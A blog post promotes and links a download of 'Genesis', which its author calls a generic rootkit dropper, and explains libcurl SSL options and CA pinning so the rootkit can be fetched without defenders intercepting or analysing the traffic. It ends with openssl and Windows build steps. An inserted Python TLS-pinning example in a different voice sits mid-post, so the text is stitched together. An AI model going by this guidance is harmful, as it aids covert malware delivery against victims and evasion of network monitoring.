Genesis – Generic Rootkit Dropper with SSL Support

Quick update to add SSL support to Genesis, my (very) generic rootkit dropper, which you can download at http://leetsys.com/programs/genesis/genesis-ssl.zip.  This allows us to download our rootkit over an encrypted tunnel.  Genesis still uses the curl library; however, I chose not to compile it statically in this case.  If you wanted to compile this statically you would have to include the OpenSSL library as well, which means the binary would be HUGE.  So, rather than having both versions of Genesis statically compiled, you would just have to choose which version is better suited for the task.

Curl gives us a few options worth configuring for a rootkit dropper.

CURLOPT_SSL_VERIFYPEER – If enabled, the remote certificate is verified as having been signed by a ‘valid CA’, that is, NOT self-signed.

CURLOPT_SSL_VERIFYHOST – If enabled, the certificate is only accepted if it matches the hostname that we are connecting to.

CURLOPT_CAINFO – This option lets you specify a CA certificate that the server certificate must be signed by.  This option is particularly helpful for our purposes of downloading a rootkit, or any other sensitive file.  If the server’s certificate was not signed by our CA certificate the file will not be downloaded, which would prevent a potential SSL man-in-the-middle.  To use this option you must have CURLOPT_SSL_VERIFYPEER enabled.

Unfortunately CURLOPT_CAINFO takes a file name and not a file handle, so there is a slight gap for us here.  If someone wanted to intercept the traffic to analyze our network communications they could simply replace the certificate file on disk with one they generated.  It would be much better to include the contents of the certificate in our binary directly to avoid any potential abuse, but there are still ways we can guarantee we are using the correct certificate.  For example, we could take an MD5 of the certificate and include that digest in our binary; at run time we hash the certificate file and verify it has not been modified before passing its path to the curl function.  I’ll probably add this in a future release.
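To make the three curl options and the file-hash check above concrete, here is an added Python example; it is not code from Genesis or from the curl project. It uses only the standard ssl, hashlib and hmac modules, with Python's ssl attributes standing in for the libcurl options (verify_mode = CERT_REQUIRED for CURLOPT_SSL_VERIFYPEER, check_hostname for CURLOPT_SSL_VERIFYHOST, load_verify_locations for CURLOPT_CAINFO), and it uses SHA-256 rather than MD5 for the pin. CA_PEM is a constructed placeholder, not a real certificate, so load_verify_locations is only called when a real PEM path is supplied; PINNED_CA_SHA256 stands in for a digest that a hypothetical build step would embed in the client. The weak context next to the strict one is what a code audit of any TLS client checks for.

```python
import hashlib
import hmac
import os
import ssl
import tempfile
from typing import Optional, Tuple

# Constructed placeholder standing in for the bytes of ca.crt. It is not a real
# certificate; it exists only so the example runs offline. In a real client the
# file would be the PEM CA generated with the openssl commands on this page.
CA_PEM = (
    b"-----BEGIN CERTIFICATE-----\n"
    b"EXAMPLE-PLACEHOLDER-CA-CERTIFICATE-BODY\n"
    b"-----END CERTIFICATE-----\n"
)

# Digest that a hypothetical build step would embed in the client binary.
# Computed here from the placeholder so the example is self-contained.
PINNED_CA_SHA256 = hashlib.sha256(CA_PEM).hexdigest()


def ca_bytes_match_pin(pem_bytes: bytes, expected_hex: str) -> bool:
    """True only if the CA file content hashes to the embedded digest."""
    actual = hashlib.sha256(pem_bytes).hexdigest()
    # Constant-time comparison so the check itself leaks nothing via timing.
    return hmac.compare_digest(actual, expected_hex)


def verify_ca_file(path: str, expected_hex: str) -> bool:
    """Read the on-disk CA file and check it against the pin before trusting it.

    CURLOPT_CAINFO takes a path, so without this check a file swapped on disk
    would be accepted silently.
    """
    with open(path, "rb") as fh:
        return ca_bytes_match_pin(fh.read(), expected_hex)


def strict_tls_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """The secure configuration: peer verified, hostname checked, optional pinned CA.

      verify_mode = CERT_REQUIRED  ~ CURLOPT_SSL_VERIFYPEER = 1
      check_hostname = True        ~ CURLOPT_SSL_VERIFYHOST = 2
      load_verify_locations(...)   ~ CURLOPT_CAINFO
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = True
    ctx.verify_mode = ssl.CERT_REQUIRED
    if cafile is not None:
        ctx.load_verify_locations(cafile=cafile)  # trust only this CA
    else:
        ctx.load_default_certs()  # fall back to the system trust store
    return ctx


def weak_tls_context() -> ssl.SSLContext:
    """What VERIFYPEER=0 / VERIFYHOST=0 amounts to: any certificate is accepted,
    so an on-path interceptor with a self-signed certificate goes unnoticed."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False  # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def context_is_strict(ctx: ssl.SSLContext) -> bool:
    """Audit helper: does this context reject unverified peers and mismatched names?"""
    return ctx.verify_mode == ssl.CERT_REQUIRED and bool(ctx.check_hostname)


def demo() -> Tuple[bool, bool]:
    """Write the placeholder CA to a temp file, check it, tamper with it, re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "ca.crt")
        with open(path, "wb") as fh:
            fh.write(CA_PEM)
        untouched = verify_ca_file(path, PINNED_CA_SHA256)
        # Simulate the file on disk being replaced with a different certificate.
        with open(path, "wb") as fh:
            fh.write(CA_PEM.replace(b"PLACEHOLDER", b"SWAPPED-IN"))
        swapped = verify_ca_file(path, PINNED_CA_SHA256)
    return untouched, swapped


if __name__ == "__main__":
    print("CA pin check (original, swapped):", demo())
    print("strict context verifies peer and host:", context_is_strict(strict_tls_context()))
    print("weak context verifies peer and host:", context_is_strict(weak_tls_context()))
```

Run it directly to see the pin check pass on the untouched file and fail once the file has been replaced; the strict context reports True and the weak one False. Note the order in weak_tls_context: Python refuses to set verify_mode to CERT_NONE while check_hostname is still True, which is a useful guard against disabling peer verification by accident.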

The CA certificate must be in PEM format and can be generated with the following commands:

openssl req -new -x509 -extensions v3_ca -keyout ca.key  -out ca.crt -days 3650

openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr

openssl x509 -req -days 365 -in server.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out server.crt

I included the curl and OpenSSL libraries in the archive, but if you need to compile them yourself you can follow these simple instructions.

Download the OpenSSL binary distribution from http://www.slproweb.com/products/Win32OpenSSL.html
I used Win32 OpenSSL v1.0.0f at http://www.slproweb.com/download/Win32OpenSSL-1_0_0f.exe
Alternatively you could build from source, but all the work is done for you already.

Set the correct OpenSSL variables in the Makefile.m32 file in both the lib and src directories; for the exact settings that worked for me, see the notes file included in the archive.

Run mingw32-make mingw32-ssl from the curl directory.
